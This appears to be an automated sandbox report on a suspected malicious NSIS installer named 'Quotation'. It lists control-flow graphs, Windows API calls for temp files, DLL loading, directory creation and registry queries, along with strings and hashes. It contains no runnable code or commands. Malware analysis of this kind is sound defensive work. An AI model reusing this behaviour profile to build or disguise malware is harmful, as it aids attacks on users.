                                                                control_flow_graph 946 403148-403181 947 403190-4031a4 call 406926 946->947 948 403183-40318b call 403131 946->948 952 403357 947->952 953 4031aa-4031b0 947->953 948->947 956 403359 952->956 954 4031b6-4031e0 GetTickCount 953->954 955 4032f9-4032fb 953->955 957 4032f1-4032f3 954->957 958 4031e6-4031fd call 40311b 954->958 959 403340-403355 call 40311b 955->959 960 4032fd-4032ff 955->960 961 40335a-403364 956->961 957->961 958->952 969 403203-403211 958->969 959->952 959->957 960->957 964 403301 960->964 967 403306-403316 call 40311b 964->967 967->952 972 403318-403328 call 4069e9 967->972 971 40321b-403237 call 406e86 969->971 977 4032f5-4032f7 971->977 978 40323d-40325d GetTickCount 971->978 979 40332a-403338 972->979 980 40333c-40333e 972->980 977->956 981 4032aa-4032b0 978->981 982 40325f-403268 978->982 979->967 985 40333a 979->985 980->956 983 4032b2-4032b4 981->983 984 4032e9-4032eb 981->984 986 40326a-40326c 982->986 987 40326e-4032a6 MulDiv wsprintfW call 405d18 982->987 988 4032b6-4032bf call 4069e9 983->988 989 4032ce-4032d6 983->989 984->957 984->958 985->957 986->981 986->987 987->981 994 4032c4-4032c6 988->994 992 4032da-4032e1 989->992 992->971 995 4032e7 992->995 994->980 996 4032c8-4032cc 994->996 995->957 996->992
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004031B6
                                                                • GetTickCount.KERNEL32 ref: 00403248
                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403278
                                                                • wsprintfW.USER32 ref: 00403289
                                                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CountTick$FilePointerwsprintf
                                                                • String ID: ... %d%%$<Py
                                                                • API String ID: 999035486-2352372732
                                                                • Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                • Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
                                                                • Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                • Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 997 40617c-40619c GetSystemDirectoryW 998 4061b6 997->998 999 40619e-4061a0 997->999 1000 4061b8 998->1000 999->998 1001 4061a2-4061ad 999->1001 1003 4061bd-4061ea wsprintfW LoadLibraryExW 1000->1003 1001->1000 1002 4061af-4061b4 1001->1002 1002->1003
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                • wsprintfW.USER32 ref: 004061CF
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1004 406a34-406a40 1005 406a41-406a73 GetTickCount GetTempFileNameW 1004->1005 1006 406a75-406a77 1005->1006 1007 406a7e 1005->1007 1006->1005 1008 406a79-406a7c 1006->1008 1009 406a80-406a83 1007->1009 1008->1009
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00406A50
                                                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406A6B
                                                                Strings
                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
                                                                • n, xrefs: 00406A42
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39
                                                                • a, xrefs: 00406A49
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                • API String ID: 1716503409-1137806429
                                                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                • Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
                                                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                • Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1010 4068c4-4068da GetModuleHandleA 1011 4068e6-4068ee GetProcAddress 1010->1011 1012 4068dc-4068dd call 40617c 1010->1012 1014 4068f4-4068f6 1011->1014 1015 4068e2-4068e4 1012->1015 1015->1011 1015->1014
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                  • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                  • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                  • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                • API String ID: 2547128583-890815371
                                                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1016 405e1c-405e65 CreateDirectoryW 1017 405e67-405e72 GetLastError 1016->1017 1018 405e8a-405e8c 1016->1018 1019 405e94-405e95 1017->1019 1020 405e74-405e88 SetFileSecurityW 1017->1020 1018->1019 1020->1018 1021 405e8e GetLastError 1020->1021 1021->1019
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
                                                                • GetLastError.KERNEL32 ref: 00405E67
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
                                                                • GetLastError.KERNEL32 ref: 00405E8E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID:
                                                                • API String ID: 3449924974-0
                                                                • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                • Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
                                                                • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                • Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1022 406955-406988 call 4062b6 1025 4069c7-4069c9 1022->1025 1026 40698a-4069b9 RegQueryValueExW RegCloseKey 1022->1026 1028 4069cc-4069ce 1025->1028 1026->1025 1027 4069bb-4069bf 1026->1027 1027->1028 1029 4069c1-4069c5 1027->1029 1029->1025 1029->1028
                                                                APIs
                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
                                                                • RegCloseKey.KERNELBASE(?), ref: 004069A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue
                                                                • String ID: Call
                                                                • API String ID: 3356406503-1824292864
                                                                • Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                • Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
                                                                • Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                • Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1030 405dfc-405e0c CreateDirectoryW 1031 405e16-405e19 1030->1031 1032 405e0e-405e14 GetLastError 1030->1032 1032->1031
                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00405E04
                                                                • GetLastError.KERNEL32 ref: 00405E0E
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectoryErrorLast
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 1375471231-823278215
                                                                • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                • Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
                                                                • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                • Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8
                                                                APIs
                                                                  • Part of subcall function 733F2351: GlobalFree.KERNEL32(?), ref: 733F2A44
                                                                  • Part of subcall function 733F2351: GlobalFree.KERNEL32(?), ref: 733F2A4A
                                                                  • Part of subcall function 733F2351: GlobalFree.KERNEL32(?), ref: 733F2A50
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F1738
                                                                • FreeLibrary.KERNEL32(?), ref: 733F17C3
                                                                • GlobalFree.KERNEL32(00000000), ref: 733F17E9
                                                                  • Part of subcall function 733F1FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 733F1FFA
                                                                  • Part of subcall function 733F17F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,733F1708,00000000), ref: 733F189A
                                                                  • Part of subcall function 733F1F1E: wsprintfW.USER32 ref: 733F1F51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2288029483.00000000733F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 733F0000, based on PE: true
                                                                • Associated: 00000000.00000002.2287862220.00000000733F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288085712.00000000733F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000000.00000002.2288109582.00000000733F6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_733f0000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                • String ID:
                                                                • API String ID: 3962662361-0
                                                                • Opcode ID: 71eaa77f52fe1da1bd572221c488ecb26a4f42cf77df67aeeda1f4f2a146696f
                                                                • Instruction ID: 7f21ce5427bc81f0fe064b0c42b733affe4e854b4bbd5480e2b27467abf35c49
                                                                • Opcode Fuzzy Hash: 71eaa77f52fe1da1bd572221c488ecb26a4f42cf77df67aeeda1f4f2a146696f
                                                                • Instruction Fuzzy Hash: FB41C076C0038FEFE7759E25EC44F9A37BCBB00311F94411AF84E9A191DB78A649C650
                                                                APIs
                                                                • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2247606924.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2247538837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247621728.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2247690342.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2248541428.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                • Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
                                                                • Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                • Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C
                                                                APIs
                                                                  • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                  • Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,75923420,?), ref: 00406BB2
                                                                  • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
                                                                  • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1
                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406D90
                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406DA4
                                                                  • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,75923420,004039A0), ref: 00406DBC
                                                                • lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,75923420,?), ref: 0040666A
                                                                • GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                  • Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
